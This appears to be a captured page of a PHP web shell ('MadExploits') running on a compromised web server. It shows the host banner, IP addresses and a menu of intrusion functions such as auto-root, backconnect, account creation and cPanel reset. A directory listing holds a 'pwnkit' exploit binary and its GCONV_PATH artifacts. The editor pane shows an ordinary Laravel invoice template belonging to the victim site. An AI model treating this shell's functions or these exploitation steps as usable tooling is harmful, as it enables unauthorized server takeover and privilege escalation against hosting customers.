Linux clientvps21.redlake.in 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
LiteSpeed
: 95.216.48.241 | : 216.73.216.248
14 Domain
8.1.34
mydemowebs
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
mydemowebs /
.trash /
quotation /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
create.blade.php
13.52
KB
-rw-r--r--
pdf.blade.php
4.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pdf.blade.php
<html> <head> <meta charset="utf-8"> <title>Quotation</title> <style> body { font-family: DejaVu Sans, sans-serif; font-size: 12px; } table { width: 100%; border-collapse: collapse; } th, td { border: 1px solid #000; padding: 6px; text-align: center; } .no-border td, .no-border th { border: none; } .text-left { text-align: left; } .text-right { text-align: right; } .summary td { font-weight: bold; } .bank-table td { text-align: left; padding: 6px; border: 1px solid #000; } </style> </head> <body> {{-- Header --}} <table class="no-border"> <tr> <td class="text-left" style="width:30%;"> <strong>From</strong><br> {{ $business->title ?? 'EBI (Eco Beam Infrastructure)' }}<br> {{ $business->addresses ?? 'Test' }}<br> {{ $business->gst_number ?? 'Test' }} </td> <td class="text-left" style="width:30%;"> <strong>Bill To</strong><br> {{ $quotation->customer_name }}<br> {{ $quotation->customer_address }} </td> <td class="text-left" style="width:40%;"> <strong>Date:</strong> {{ \Carbon\Carbon::parse($quotation->created_at)->format('d M, Y') }}<br> <strong>Created by:</strong> {{ $quotation->created_by ?? 'Admin' }}<br> <strong>Contact:</strong> {{ $business->phones ?? '7037538888' }} </td> </tr> </table> <h2 style="text-align:center; margin:15px 0;">Quotation</h2> {{-- Items Table --}} <table> <thead> <tr> <th>#</th> <th>Item & Description</th> <th>Qty</th> <th>Rate</th> <th>Discount</th> <!--<th>CGST</th>--> <!--<th>SGST</th>--> <th>Total</th> </tr> </thead> <tbody> @foreach($quotation->items as $index => $item) <tr> <td>{{ $index+1 }}</td> <td class="text-left">{{ $item->product->title ?? $item->description }}</td> <td>{{ $item->quantity }}</td> <td>₹{{ number_format($item->price, 2) }}</td> <td>₹{{ number_format($item->discount, 2) }}</td> <!--<td>{{ $item->cgst ?? 0 }}%</td>--> <!--<td>{{ $item->sgst ?? 0 }}%</td>--> <td>₹{{ number_format($item->amount, 2) }}</td> </tr> @endforeach </tbody> </table> {{-- Summary --}} <table class="no-border" style="margin-top:10px;"> <tr> <td class="text-right" style="width:70%;">Taxable Amount:</td> <td class="text-right">₹{{ number_format($quotation->subtotal, 2) }}</td> </tr> <tr> <td class="text-right">CGST:</td> <td class="text-right">₹{{ number_format($quotation->gst_amount / 2, 2) }}</td> </tr> <tr> <td class="text-right">SGST:</td> <td class="text-right">₹{{ number_format($quotation->gst_amount / 2, 2) }}</td> </tr> <tr> <td class="text-right"><strong>Total:</strong></td> <td class="text-right"><strong>₹{{ number_format($quotation->grand_total, 2) }}</strong></td> </tr> </table> {{-- Notes --}} <p><strong>Notes:</strong><br> Please Refer Detailed Terms & Condition for payment & Warranty </p> {{-- Terms & Conditions --}} <h4>Terms & Conditions</h4> <ul style="margin:0; padding-left:18px; font-size:12px;"> <li>Quotation valid 30 days.</li> <li>Prices include GST.</li> <li>Payment: 50% advance, balance on delivery & installation.</li> <li>Warranty: As per manufacturer + 1 yr workmanship.</li> <li>Extra work & govt. approvals not included.</li> </ul> @if($quotation->bank) <h4>Bank Details</h4> <table class="bank-table"> <tr><td>Bank Name</td><td>{{ $quotation->bank->bank_name }}</td></tr> <tr><td>Beneficiary Name</td><td>{{ $quotation->bank->account_holder_name }}</td></tr> <tr><td>Account Number</td><td>{{ $quotation->bank->account_number }}</td></tr> <tr><td>IFSC Code</td><td>{{ $quotation->bank->ifsc }}</td></tr> <tr><td>Branch</td><td>{{ $quotation->bank->branch }}</td></tr> <tr><td>Mobile Number</td><td>{{ $quotation->bank->mobile }}</td></tr> </table> @endif {{-- Signature --}} <p style="text-align:right; margin-top:50px;"> <img src="{{ public_path('admin/assets/images/stamp.png') }}" width="100"><br> Authorized Sign </p> </body> </html>
Close